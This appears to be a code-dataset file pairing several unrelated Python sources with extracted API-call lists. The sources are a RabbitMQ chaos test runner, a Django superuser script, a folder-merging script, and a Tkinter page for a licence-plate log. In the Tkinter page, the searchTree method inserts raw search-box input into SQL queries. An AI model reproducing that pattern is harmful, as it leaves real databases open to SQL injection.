        console_out(f"TEST RUN: {str(test_number)} of {tests}--------------------------", "TEST RUNNER")
        # ----- deploy a cluster and create the queue (retry until up) ---
        setup_complete = False
        while not setup_complete:
            broker_manager = BrokerManager()
            broker_manager.deploy(cluster_size, True, rmq_version, False)
            initial_nodes = broker_manager.get_initial_nodes()
            console_out(f"Initial nodes: {initial_nodes}", "TEST RUNNER")
            print_mod = in_flight_max * 5
            queue_name = queue + "_" + str(test_number)
            mgmt_node = broker_manager.get_random_init_node()
            queue_created = False
            qc_ctr = 0
            # Up to 20 attempts to create the (optionally single-active-
            # consumer) quorum queue before redeploying the cluster.
            while queue_created == False and qc_ctr < 20:
                qc_ctr += 1
                if sac_enabled:
                    queue_created = broker_manager.create_quorum_sac_queue(mgmt_node, queue_name, cluster_size, 0)
                else:
                    queue_created = broker_manager.create_quorum_queue(mgmt_node, queue_name, cluster_size, 0)
                if queue_created:
                    setup_complete = True
                else:
                    time.sleep(5)
        time.sleep(10)
        # ----- start monitor, publisher and consumer --------------------
        msg_monitor = MessageMonitor("qqt", test_number, print_mod, True, False)
        publisher = RabbitPublisher(1, test_number, broker_manager, in_flight_max, 120, print_mod)
        publisher.configure_sequence_direct(queue_name, count, 0, 1)
        consumer_manager = ConsumerManager(broker_manager, msg_monitor, "TEST RUNNER", False)
        consumer_manager.add_consumers(1, test_number, queue_name, prefetch)
        chaos = ChaosExecutor(initial_nodes)
        if chaos_mode == "partitions":
            chaos.only_partitions()
        elif chaos_mode == "nodes":
            chaos.only_kill_nodes()
        monitor_thread = threading.Thread(target=msg_monitor.process_messages)
        monitor_thread.start()
        consumer_manager.start_consumers()
        pub_thread = threading.Thread(target=publisher.start_publishing)
        pub_thread.start()
        console_out("publisher started", "TEST RUNNER")
        # ----- execute the chaos actions with random pauses -------------
        for action_num in range(1, actions+1):
            wait_sec = random.randint(chaos_min_interval, chaos_max_interval)
            console_out(f"waiting for {wait_sec} seconds before next action", "TEST RUNNER")
            time.sleep(wait_sec)
            console_out(f"execute chaos action {str(action_num)}/{actions} of test {str(test_number)}", "TEST RUNNER")
            chaos.execute_chaos_action()
            subprocess.call(["bash", "../cluster/cluster-status.sh"])
        time.sleep(60)
        console_out("repairing cluster", "TEST RUNNER")
        chaos.repair()
        console_out("repaired cluster", "TEST RUNNER")
        publisher.stop_publishing()
        console_out("starting grace period for consumer to catch up", "TEST RUNNER")
        # ----- wait until the consumer has seen every confirmed message,
        # or the grace period has passed with 15s of silence --------------
        ctr = 0
        while True:
            ms_since_last_msg = datetime.datetime.now() - msg_monitor.get_last_msg_time()
            if msg_monitor.get_unique_count() >= publisher.get_pos_ack_count() and len(publisher.get_msg_set().difference(msg_monitor.get_msg_set())) == 0:
                break
            elif ctr > grace_period_sec and ms_since_last_msg.total_seconds() > 15:
                break
            time.sleep(1)
            ctr += 1
        # ----- report results: lost / duplicated / out-of-order ---------
        confirmed_set = publisher.get_msg_set()
        lost_msgs = confirmed_set.difference(msg_monitor.get_msg_set())
        console_out("RESULTS------------------------------------", "TEST RUNNER")
        if len(lost_msgs) > 0:
            console_out(f"Lost messages count: {len(lost_msgs)}", "TEST RUNNER")
            for msg in lost_msgs:
                console_out(f"Lost message: {msg}", "TEST RUNNER")
        console_out(f"Confirmed count: {publisher.get_pos_ack_count()} Received count: {msg_monitor.get_receive_count()} Unique received: {msg_monitor.get_unique_count()}", "TEST RUNNER")
        success = True
        if msg_monitor.get_out_of_order() == True:
            console_out("FAILED TEST: OUT OF ORDER MESSAGES", "TEST RUNNER")
            success = False
        if len(lost_msgs) > 0:
            console_out("FAILED TEST: LOST MESSAGES", "TEST RUNNER")
            success = False
        if success == True:
            console_out("TEST OK", "TEST RUNNER")
        console_out("RESULTS END------------------------------------", "TEST RUNNER")
        # ----- best-effort cleanup before the next run -------------------
        try:
            consumer_manager.stop_all_consumers()
            pub_thread.join()
        except Exception as e:
            console_out("Failed to clean up test correctly: " + str(e), "TEST RUNNER")
        console_out(f"TEST {str(test_number)} COMPLETE", "TEST RUNNER")
if __name__ == '__main__':
    main()
|
[
"threading.Thread",
"printer.console_out",
"random.randint",
"ConsumerManager.ConsumerManager",
"ChaosExecutor.ChaosExecutor",
"command_args.get_args",
"time.sleep",
"command_args.get_optional_arg",
"BrokerManager.BrokerManager",
"command_args.get_optional_arg_validated",
"subprocess.call",
"MessageMonitor.MessageMonitor",
"command_args.get_mandatory_arg",
"datetime.datetime.now",
"RabbitPublisher.RabbitPublisher"
] |
[((643, 661), 'command_args.get_args', 'get_args', (['sys.argv'], {}), '(sys.argv)\n', (651, 661), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((961, 1001), 'command_args.get_optional_arg', 'get_optional_arg', (['args', '"""--cluster"""', '"""3"""'], {}), "(args, '--cluster', '3')\n", (977, 1001), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1014, 1048), 'command_args.get_mandatory_arg', 'get_mandatory_arg', (['args', '"""--queue"""'], {}), "(args, '--queue')\n", (1031, 1048), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1126, 1173), 'command_args.get_optional_arg', 'get_optional_arg', (['args', '"""--chaos-mode"""', '"""mixed"""'], {}), "(args, '--chaos-mode', 'mixed')\n", (1142, 1173), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1423, 1522), 'command_args.get_optional_arg_validated', 'get_optional_arg_validated', (['args', '"""--rmq-version"""', '"""3.8-beta"""', "['3.7', '3.8-beta', '3.8-alpha']"], {}), "(args, '--rmq-version', '3.8-beta', ['3.7',\n '3.8-beta', '3.8-alpha'])\n", (1449, 1522), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((705, 739), 'command_args.get_mandatory_arg', 'get_mandatory_arg', (['args', '"""--tests"""'], {}), "(args, '--tests')\n", (722, 739), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((759, 795), 'command_args.get_mandatory_arg', 'get_mandatory_arg', (['args', '"""--actions"""'], {}), "(args, '--actions')\n", (776, 795), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((821, 866), 
'command_args.get_optional_arg', 'get_optional_arg', (['args', '"""--in-flight-max"""', '(10)'], {}), "(args, '--in-flight-max', 10)\n", (837, 866), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((895, 940), 'command_args.get_mandatory_arg', 'get_mandatory_arg', (['args', '"""--grace-period-sec"""'], {}), "(args, '--grace-period-sec')\n", (912, 940), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1075, 1107), 'command_args.get_mandatory_arg', 'get_mandatory_arg', (['args', '"""--sac"""'], {}), "(args, '--sac')\n", (1092, 1107), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1203, 1255), 'command_args.get_optional_arg', 'get_optional_arg', (['args', '"""--chaos-min-interval"""', '"""30"""'], {}), "(args, '--chaos-min-interval', '30')\n", (1219, 1255), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1286, 1339), 'command_args.get_optional_arg', 'get_optional_arg', (['args', '"""--chaos-max-interval"""', '"""120"""'], {}), "(args, '--chaos-max-interval', '120')\n", (1302, 1339), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1360, 1403), 'command_args.get_optional_arg', 'get_optional_arg', (['args', '"""--pre-fetch"""', '"""10"""'], {}), "(args, '--pre-fetch', '10')\n", (1376, 1403), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((2804, 2818), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (2814, 2818), False, 'import time\n'), ((2842, 2900), 'MessageMonitor.MessageMonitor', 'MessageMonitor', (['"""qqt"""', 'test_number', 'print_mod', '(True)', '(False)'], {}), "('qqt', test_number, print_mod, True, False)\n", (2856, 
2900), False, 'from MessageMonitor import MessageMonitor\n'), ((2921, 2999), 'RabbitPublisher.RabbitPublisher', 'RabbitPublisher', (['(1)', 'test_number', 'broker_manager', 'in_flight_max', '(120)', 'print_mod'], {}), '(1, test_number, broker_manager, in_flight_max, 120, print_mod)\n', (2936, 2999), False, 'from RabbitPublisher import RabbitPublisher\n'), ((3096, 3162), 'ConsumerManager.ConsumerManager', 'ConsumerManager', (['broker_manager', 'msg_monitor', '"""TEST RUNNER"""', '(False)'], {}), "(broker_manager, msg_monitor, 'TEST RUNNER', False)\n", (3111, 3162), False, 'from ConsumerManager import ConsumerManager\n'), ((3257, 3285), 'ChaosExecutor.ChaosExecutor', 'ChaosExecutor', (['initial_nodes'], {}), '(initial_nodes)\n', (3270, 3285), False, 'from ChaosExecutor import ChaosExecutor\n'), ((3468, 3521), 'threading.Thread', 'threading.Thread', ([], {'target': 'msg_monitor.process_messages'}), '(target=msg_monitor.process_messages)\n', (3484, 3521), False, 'import threading\n'), ((3627, 3678), 'threading.Thread', 'threading.Thread', ([], {'target': 'publisher.start_publishing'}), '(target=publisher.start_publishing)\n', (3643, 3678), False, 'import threading\n'), ((3714, 3761), 'printer.console_out', 'console_out', (['"""publisher started"""', '"""TEST RUNNER"""'], {}), "('publisher started', 'TEST RUNNER')\n", (3725, 3761), False, 'from printer import console_out\n'), ((4254, 4268), 'time.sleep', 'time.sleep', (['(60)'], {}), '(60)\n', (4264, 4268), False, 'import time\n'), ((4277, 4324), 'printer.console_out', 'console_out', (['"""repairing cluster"""', '"""TEST RUNNER"""'], {}), "('repairing cluster', 'TEST RUNNER')\n", (4288, 4324), False, 'from printer import console_out\n'), ((4356, 4402), 'printer.console_out', 'console_out', (['"""repaired cluster"""', '"""TEST RUNNER"""'], {}), "('repaired cluster', 'TEST RUNNER')\n", (4367, 4402), False, 'from printer import console_out\n'), ((4457, 4533), 'printer.console_out', 'console_out', (['"""starting grace 
period for consumer to catch up"""', '"""TEST RUNNER"""'], {}), "('starting grace period for consumer to catch up', 'TEST RUNNER')\n", (4468, 4533), False, 'from printer import console_out\n'), ((5130, 5203), 'printer.console_out', 'console_out', (['"""RESULTS------------------------------------"""', '"""TEST RUNNER"""'], {}), "('RESULTS------------------------------------', 'TEST RUNNER')\n", (5141, 5203), False, 'from printer import console_out\n'), ((6021, 6098), 'printer.console_out', 'console_out', (['"""RESULTS END------------------------------------"""', '"""TEST RUNNER"""'], {}), "('RESULTS END------------------------------------', 'TEST RUNNER')\n", (6032, 6098), False, 'from printer import console_out\n'), ((1793, 1808), 'BrokerManager.BrokerManager', 'BrokerManager', ([], {}), '()\n', (1806, 1808), False, 'from BrokerManager import BrokerManager\n'), ((1971, 2032), 'printer.console_out', 'console_out', (['f"""Initial nodes: {initial_nodes}"""', '"""TEST RUNNER"""'], {}), "(f'Initial nodes: {initial_nodes}', 'TEST RUNNER')\n", (1982, 2032), False, 'from printer import console_out\n'), ((3833, 3887), 'random.randint', 'random.randint', (['chaos_min_interval', 'chaos_max_interval'], {}), '(chaos_min_interval, chaos_max_interval)\n', (3847, 3887), False, 'import random\n'), ((3900, 3985), 'printer.console_out', 'console_out', (['f"""waiting for {wait_sec} seconds before next action"""', '"""TEST RUNNER"""'], {}), "(f'waiting for {wait_sec} seconds before next action', 'TEST RUNNER'\n )\n", (3911, 3985), False, 'from printer import console_out\n'), ((3993, 4013), 'time.sleep', 'time.sleep', (['wait_sec'], {}), '(wait_sec)\n', (4003, 4013), False, 'import time\n'), ((4187, 4244), 'subprocess.call', 'subprocess.call', (["['bash', '../cluster/cluster-status.sh']"], {}), "(['bash', '../cluster/cluster-status.sh'])\n", (4202, 4244), False, 'import subprocess\n'), ((4965, 4978), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (4975, 4978), False, 'import 
time\n'), ((5703, 5767), 'printer.console_out', 'console_out', (['"""FAILED TEST: OUT OF ORDER MESSAGES"""', '"""TEST RUNNER"""'], {}), "('FAILED TEST: OUT OF ORDER MESSAGES', 'TEST RUNNER')\n", (5714, 5767), False, 'from printer import console_out\n'), ((5848, 5904), 'printer.console_out', 'console_out', (['"""FAILED TEST: LOST MESSAGES"""', '"""TEST RUNNER"""'], {}), "('FAILED TEST: LOST MESSAGES', 'TEST RUNNER')\n", (5859, 5904), False, 'from printer import console_out\n'), ((5974, 6011), 'printer.console_out', 'console_out', (['"""TEST OK"""', '"""TEST RUNNER"""'], {}), "('TEST OK', 'TEST RUNNER')\n", (5985, 6011), False, 'from printer import console_out\n'), ((4611, 4634), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4632, 4634), False, 'import datetime\n'), ((5367, 5417), 'printer.console_out', 'console_out', (['f"""Lost message: {msg}"""', '"""TEST RUNNER"""'], {}), "(f'Lost message: {msg}', 'TEST RUNNER')\n", (5378, 5417), False, 'from printer import console_out\n'), ((2781, 2794), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2791, 2794), False, 'import time\n')]
|
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'sigi_op.settings'
import django
django.setup()
# get_user_model's canonical, public location is django.contrib.auth; the
# previous import reached into the createsuperuser management command module.
from django.contrib.auth import get_user_model

# Create the default admin account once, idempotently.
User = get_user_model()
if User.objects.filter(username='admin').exists():
    # .exists() issues an EXISTS query instead of fetching rows just to
    # test queryset truthiness.
    print("Super user already created")
else:
    # Use the public manager API rather than the private
    # _default_manager.db_manager('default') chain ('default' is already
    # the default database).
    User.objects.create_superuser(username='admin', email='<EMAIL>', password='<PASSWORD>')
    print("Super user created")
|
[
"django.setup",
"django.contrib.auth.management.commands.createsuperuser.get_user_model"
] |
[((82, 96), 'django.setup', 'django.setup', ([], {}), '()\n', (94, 96), False, 'import django\n'), ((184, 200), 'django.contrib.auth.management.commands.createsuperuser.get_user_model', 'get_user_model', ([], {}), '()\n', (198, 200), False, 'from django.contrib.auth.management.commands.createsuperuser import get_user_model\n'), ((286, 302), 'django.contrib.auth.management.commands.createsuperuser.get_user_model', 'get_user_model', ([], {}), '()\n', (300, 302), False, 'from django.contrib.auth.management.commands.createsuperuser import get_user_model\n')]
|
import os
import shutil

# Source/destination defaults kept as module-level names for compatibility.
# (Removed: a duplicate `import shutil`, and unused imports of numpy and the
# deprecated distutils.dir_util.copy_tree, which is gone in Python 3.12.)
path = "dataset"
split_path = "dataset_splits"
all_paths = []


def merge_splits(dest_path=path, splits_path=split_path):
    """Move every project folder out of *splits_path*'s split folders into *dest_path*.

    Walks each split folder (e.g. train/val/test) and moves its project
    sub-folders into the flat *dest_path* directory.  Failures for a single
    project (typically because it already exists at the destination) are
    printed and skipped so the remaining projects are still moved.
    """
    for split_name in os.listdir(splits_path):
        split_dir = os.path.join(splits_path, split_name)
        print(split_dir)
        for project_name in os.listdir(split_dir):
            project_dir = os.path.join(split_dir, project_name)
            try:
                shutil.move(project_dir, dest_path)
            except (OSError, shutil.Error) as exc:
                # shutil.move raises shutil.Error when the target already
                # exists; report and continue, as before.
                print(exc)


if __name__ == "__main__":
    merge_splits()
|
[
"os.path.join",
"os.listdir",
"shutil.move"
] |
[((171, 193), 'os.listdir', 'os.listdir', (['split_path'], {}), '(split_path)\n', (181, 193), False, 'import os, shutil\n'), ((210, 242), 'os.path.join', 'os.path.join', (['split_path', 'folder'], {}), '(split_path, folder)\n', (222, 242), False, 'import os, shutil\n'), ((286, 309), 'os.listdir', 'os.listdir', (['folder_path'], {}), '(folder_path)\n', (296, 309), False, 'import os, shutil\n'), ((361, 402), 'os.path.join', 'os.path.join', (['folder_path', 'project_folder'], {}), '(folder_path, project_folder)\n', (373, 402), False, 'import os, shutil\n'), ((413, 451), 'shutil.move', 'shutil.move', (['project_folder_path', 'path'], {}), '(project_folder_path, path)\n', (424, 451), False, 'import shutil\n')]
|
import os
import sqlite3
from tkinter import *
from tkinter import simpledialog
from tkinter import ttk
from PIL import Image, ImageTk
from DetailsPage import DetailsPage
import constants
from datetime import datetime
import tkinter.filedialog
from tkinter import messagebox
import xlwt
class HistoryPage(Frame):
    def __init__(self, master):
        """Build the history page UI and open the plate-log database.

        Lays out the search bar, results table and download bar inside a
        padded Frame, then loads every row of the ``realtest`` table into
        the Treeview.
        """
        Frame.__init__(self, master, padx=20, bg=constants.colors['main']['bg'])
        self.grid(row=1, column=1)
        # Shared ttk styling: keep readonly comboboxes readable and give
        # selected tree rows a neutral grey highlight.
        self.style = ttk.Style()
        self.style.map('TCombobox', fieldbackground=[('readonly', 'gray90')])
        self.style.map('TCombobox', selectbackground=[('readonly', 'gray90')])
        self.style.map('TCombobox', selectforeground=[('readonly', 'black')])
        self.style.map('Treeview', background=[('selected', 'gray70')])
        self.searchBar()
        self.dbtable()
        self.downloadBar()
        # connect database
        # NOTE(review): the DB path is derived by string-replacing
        # 'tkinterUI' in the current working directory with 'realtest.db',
        # which assumes the app is always launched from the tkinterUI
        # directory -- confirm.
        cwd = os.getcwd()
        parDir = cwd.replace('tkinterUI', 'realtest.db')
        self.db = sqlite3.connect(parDir)
        self.cur = self.db.cursor()
        self.cur.execute("SELECT rowid,* FROM realtest")
        # Both the "all rows" cache and the current search result start
        # out as the full table contents.
        self.searchedEntries = self.entries = self.cur.fetchall()
        self.resetTree()
        # resizable
        self.rowconfigure(1, weight=1)
        self.columnconfigure(0, weight=1)
        self.columnconfigure(1, weight=1)
        self.columnconfigure(2, weight=1)
        self.columnconfigure(3, weight=1)
        self.columnconfigure(4, weight=1)
    def __del__(self):
        # Persist any pending writes and release the SQLite handle.
        # NOTE(review): relying on __del__ for commit/close is fragile --
        # CPython may skip finalizers at interpreter shutdown; an explicit
        # close hook would be safer.  Left as-is.
        self.db.commit()
        self.db.close()
def searchBar(self):
# First Row (search)
self.searchby = StringVar(value='Reg. Number')
self.entryVar = StringVar(value='Enter Query')
searchComboVals = ('Reg. Number','Date','Time','Vehicle','Address',)
label = Label(self, text='Search by ', padx=10, pady=10)
comboBox = ttk.Combobox(self, textvariable=self.searchby, state="readonly", justify='center')
comboBox['values'] = searchComboVals
entryBox = ttk.Entry(self, textvariable=self.entryVar, width=40, justify='center')
searchBut = ttk.Button(self, text='Search', command=self.searchTree)
resetButton = ttk.Button(self, text='Reset', command=self.resetTree)
entryBox.bind('<Button-1>', self.OnSingleClickEntry)
entryBox.bind("<Return>",lambda _:self.searchTree())
comboBox.bind("<FocusIn>", lambda _: comboBox.selection_range(0, 0))
comboBox.current(0)
# grid
label.grid(row=0, column=0, sticky=N + E + S + W, pady=(15, 2), padx=(0, 2))
comboBox.grid(row=0, column=1, sticky=N + E + S + W, pady=(15, 2), padx=2)
entryBox.grid(row=0, column=2, sticky=N + E + S + W, pady=(15, 2), padx=2)
searchBut.grid(row=0, column=3, sticky=N + E + S + W, pady=(15, 2), padx=2)
resetButton.grid(row=0, column=4, sticky=N + E + S + W, pady=(15, 2), padx=(2, 0))
def dbtable(self):
# treeview
self.table = ttk.Treeview(self, height=30, selectmode='browse')
verscrlbar = ttk.Scrollbar(self, orient="vertical", command=self.table.yview)
self.table.configure(xscrollcommand=verscrlbar.set)
self.table["columns"] = ("1", "2", "3", "4", "5")
self.table['show'] = 'headings'
self.table.column("1", width=30, anchor='c')
self.table.column("2", width=120, anchor='c')
self.table.column("3", width=220, anchor='c')
self.table.column("4", width=230, anchor='c')
self.table.column("5", width=300, anchor='c')
# Assigning the heading names to the
# respective columns
self.table.heading("1", text="Id")
self.table.heading("2", text="Number")
self.table.heading("3", text="TimeStamp")
self.table.heading("4", text="Vehicle")
self.table.heading("5", text="Address")
self.table.bind("<Double-1>", self.OnDoubleClick)
self.table.grid(row=1, column=0, columnspan=5, sticky=N + E + S + W)
verscrlbar.grid(row=1, column=5, sticky=N + E + S + W)
def downloadBar(self):
# download frame
downloadFrame = Frame(self, bg=constants.colors['main']['bg'])
self.downloadType = StringVar(value='Number Plate Image')
self.downloadWhat = StringVar(value='Selected Row')
downloadLabel = Label(downloadFrame, text='Download the ', padx=10, pady=10)
downCombo = ttk.Combobox(downloadFrame, textvariable=self.downloadType, state="readonly", justify='center')
downCombo['values'] = ('Number Plate Image','Captured Image','Data as Excel')
downCombo.current(0)
ofLabel = Label(downloadFrame, text=' of ', padx=10, pady=10)
whatCombo = ttk.Combobox(downloadFrame, textvariable=self.downloadWhat, state="readonly", justify='center')
whatCombo['values'] = ('Selected Row','Searched Rows','All Rows',)
whatCombo.current(0)
downloadBut = ttk.Button(downloadFrame, text='Download', command=self.download)
downCombo.bind("<FocusIn>", lambda _: downCombo.selection_range(0, 0))
whatCombo.bind("<FocusIn>", lambda _: whatCombo.selection_range(0, 0))
# pack
downloadLabel.pack(side=LEFT, fill=X, expand=True, pady=(2, 2), padx=(0, 2))
downCombo.pack(side=LEFT, fill=X, expand=True, pady=(2, 2), padx=2)
ofLabel.pack(side=LEFT, fill=X, expand=True, pady=(2, 2), padx=2)
whatCombo.pack(side=LEFT, fill=X, expand=True, pady=(2, 2), padx=2)
downloadBut.pack(side=LEFT, fill=X, expand=True, pady=(2, 2), padx=(2, 0))
downloadFrame.grid(row=2, column=0, columnspan=5, sticky=N + E + S + W, pady=(2, 15), padx=(2, 2))
def OnSingleClickEntry(self, event):
if self.entryVar.get() == 'Enter Query':
self.entryVar.set('')
def OnDoubleClick(self, event):
id = self.table.selection()[0]
DetailsPage(self.master, id=id, cur=self.cur)
def updateTable(self, entries):
self.table.delete(*self.table.get_children())
self.table.tag_configure('odd',background='gray90')
self.table.tag_configure('even', background='snow')
FirstWhite = 0 if len(entries)%2 == 0 else 1
for entry in reversed(entries):
self.table.insert("", 'end', text="", iid=entry[0], values=(
entry[0], entry[1], entry[2], entry[3],
entry[4]), tags = ('even',) if entry[0]%2 == FirstWhite else ('odd',))
# resets tree to full data
resetTree = lambda self: self.updateTable(entries=self.entries)
def searchTree(self):
# searches and updates table
columnMap = {
'Vehicle': 'name',
'Reg. Number': 'numPlate',
'Date': 'timeStamp',
'Time': 'timeStamp',
'Address': 'address',
}
column = self.searchby.get()
query = self.entryVar.get()
if column == 'Time':
query = f"SELECT rowid,* FROM realtest WHERE {columnMap[column]} LIKE '{query}% | %'"
elif column == 'Date':
query = f"SELECT rowid,* FROM realtest WHERE {columnMap[column]} LIKE '% | {query}%'"
else:
query = f"SELECT rowid,* FROM realtest WHERE {columnMap[column]} LIKE '%{query}%'"
self.cur.execute(query)
self.searchedEntries = self.cur.fetchall()
self.updateTable(entries=self.searchedEntries)
    def download(self):
        """Export rows as an .xls spreadsheet or dump their stored images.

        The row scope (selected / all / previously searched) comes from
        the ``downloadWhat`` combobox; the output format comes from
        ``downloadType`` ('Data as Excel' writes a styled spreadsheet,
        anything else writes one PNG per row).  The target directory
        (and, for Excel, a file name) is asked for via dialogs; the
        method returns early if the user cancels any dialog.
        """
        # ifelse for selecting the number of rows to download
        if self.downloadWhat.get() == 'Selected Row':
            id = self.table.selection()
            if not id :
                tkinter.messagebox.showerror(title='Row Selection Expected', message='No Row Selected')
                return None
            # int() cast keeps the interpolated rowid numeric (no injection)
            self.cur.execute(f"SELECT rowid,* FROM realtest WHERE rowid = {int(id[0])}")
            dList = [self.cur.fetchone()]
        elif self.downloadWhat.get() == 'All Rows' :
            dList = self.entries
        else:#Searched Row
            dList = self.searchedEntries
        # ask save location
        dirname = tkinter.filedialog.askdirectory(parent=self, initialdir="/",title='Please select location to save file ')
        if not dirname:
            return
        # excel save code
        if self.downloadType.get() == 'Data as Excel':
            # ask for file name to save
            fileName = simpledialog.askstring(title="Excel File Name",
                                              prompt="Enter the name to save the excel file :")
            if not fileName:
                return
            excel = xlwt.Workbook()
            # NOTE(review): add_sheet's second parameter is cell_overwrite_ok;
            # passing datetime.now() only acts as a truthy value -- confirm intent.
            sheet = excel.add_sheet("VInLP export", datetime.now())
            # cell styles: tl/t/tr top row, l/m/r middle rows, bl/b/br bottom
            # row -- together they draw a thick border around the table.
            # NOTE(review): 'style' itself appears unused below.
            style = xlwt.easyxf('font: bold 1, color blue; borders: left thick, right thin, top thin, bottom thin; pattern: pattern solid, fore_color white;')
            tl = xlwt.easyxf('font: bold 1, color blue; border: left thick, top thick, right thin, bottom thick')
            t = xlwt.easyxf('font: bold 1, color blue; border: left thin, top thick, right thin, bottom thick')
            tr = xlwt.easyxf('font: bold 1, color blue; border: left thin, top thick, right thick, bottom thick')
            r = xlwt.easyxf('border: left thin,right thick')
            br = xlwt.easyxf('border: left thin, right thick, bottom thick')
            b = xlwt.easyxf('border: left thin,right thin, bottom thick')
            bl = xlwt.easyxf('border: left thick, right thin, bottom thick')
            l = xlwt.easyxf('border: left thick,right thin')
            m = xlwt.easyxf('border: left thin,right thin')
            # header row
            sheet.write(0, 0, 'Id', tl)
            sheet.write(0, 1, 'Registration Number', t)
            sheet.write(0, 2, 'Date', t)
            sheet.write(0, 3, 'Time', t)
            sheet.write(0, 4, 'Vehicle', t)
            sheet.write(0, 5, 'Address', tr)
            # column widths (xlwt units: 1/256 of a character width)
            sheet.col(0).width = int(4 * 260)
            sheet.col(1).width = int(17 * 260)
            sheet.col(2).width = int(11 * 260)
            sheet.col(3).width = int(12 * 260)
            sheet.col(4).width = int(30 * 260)
            sheet.col(5).width = int(35 * 260)
            # blank spacer row under the header, borders only
            sheet.write(1, 0, '', l)
            sheet.write(1, 1, '', m)
            sheet.write(1, 2, '', m)
            sheet.write(1, 3, '', m)
            sheet.write(1, 4, '', m)
            sheet.write(1, 5, '', r)
            # data rows; timeStamp (row[2]) is stored as 'time | date'
            for index, row in enumerate(dList):
                time, date = row[2].split(' | ')
                sheet.write(index+2, 0, row[0], l)
                sheet.write(index+2, 1, row[1], m)
                sheet.write(index+2, 2, date, m)
                sheet.write(index+2, 3, time, m)
                sheet.write(index+2, 4, row[3], m)
                sheet.write(index+2, 5, row[4], r)
            # closing row: empty cells carrying the bottom border
            index = len(dList) + 1
            sheet.write(index, 0,style=bl)
            sheet.write(index, 1, style=b)
            sheet.write(index, 2, style=b)
            sheet.write(index, 3, style=b)
            sheet.write(index, 4, style=b)
            sheet.write(index, 5, style=br)
            excel.save(f'{dirname}/{fileName}.xls')
        # saving images
        else:
            # row[6]/row[7] hold two image blobs; which one is written
            # depends on the chosen download type
            for row in dList:
                print(row[0])
                with open(f'{dirname}/{row[1]}.png', 'wb') as file:
                    file.write(row[6] if self.downloadType.get() == 'Captured Image' else row[7])
|
[
"DetailsPage.DetailsPage",
"tkinter.ttk.Entry",
"xlwt.Workbook",
"tkinter.ttk.Scrollbar",
"os.getcwd",
"xlwt.easyxf",
"tkinter.ttk.Style",
"tkinter.ttk.Combobox",
"tkinter.simpledialog.askstring",
"sqlite3.connect",
"tkinter.ttk.Treeview",
"tkinter.ttk.Button",
"datetime.datetime.now"
] |
[((504, 515), 'tkinter.ttk.Style', 'ttk.Style', ([], {}), '()\n', (513, 515), False, 'from tkinter import ttk\n'), ((952, 963), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (961, 963), False, 'import os\n'), ((1041, 1064), 'sqlite3.connect', 'sqlite3.connect', (['parDir'], {}), '(parDir)\n', (1056, 1064), False, 'import sqlite3\n'), ((1944, 2031), 'tkinter.ttk.Combobox', 'ttk.Combobox', (['self'], {'textvariable': 'self.searchby', 'state': '"""readonly"""', 'justify': '"""center"""'}), "(self, textvariable=self.searchby, state='readonly', justify=\n 'center')\n", (1956, 2031), False, 'from tkinter import ttk\n'), ((2093, 2164), 'tkinter.ttk.Entry', 'ttk.Entry', (['self'], {'textvariable': 'self.entryVar', 'width': '(40)', 'justify': '"""center"""'}), "(self, textvariable=self.entryVar, width=40, justify='center')\n", (2102, 2164), False, 'from tkinter import ttk\n'), ((2186, 2242), 'tkinter.ttk.Button', 'ttk.Button', (['self'], {'text': '"""Search"""', 'command': 'self.searchTree'}), "(self, text='Search', command=self.searchTree)\n", (2196, 2242), False, 'from tkinter import ttk\n'), ((2266, 2320), 'tkinter.ttk.Button', 'ttk.Button', (['self'], {'text': '"""Reset"""', 'command': 'self.resetTree'}), "(self, text='Reset', command=self.resetTree)\n", (2276, 2320), False, 'from tkinter import ttk\n'), ((3071, 3121), 'tkinter.ttk.Treeview', 'ttk.Treeview', (['self'], {'height': '(30)', 'selectmode': '"""browse"""'}), "(self, height=30, selectmode='browse')\n", (3083, 3121), False, 'from tkinter import ttk\n'), ((3146, 3210), 'tkinter.ttk.Scrollbar', 'ttk.Scrollbar', (['self'], {'orient': '"""vertical"""', 'command': 'self.table.yview'}), "(self, orient='vertical', command=self.table.yview)\n", (3159, 3210), False, 'from tkinter import ttk\n'), ((4541, 4641), 'tkinter.ttk.Combobox', 'ttk.Combobox', (['downloadFrame'], {'textvariable': 'self.downloadType', 'state': '"""readonly"""', 'justify': '"""center"""'}), "(downloadFrame, textvariable=self.downloadType, state=\n 
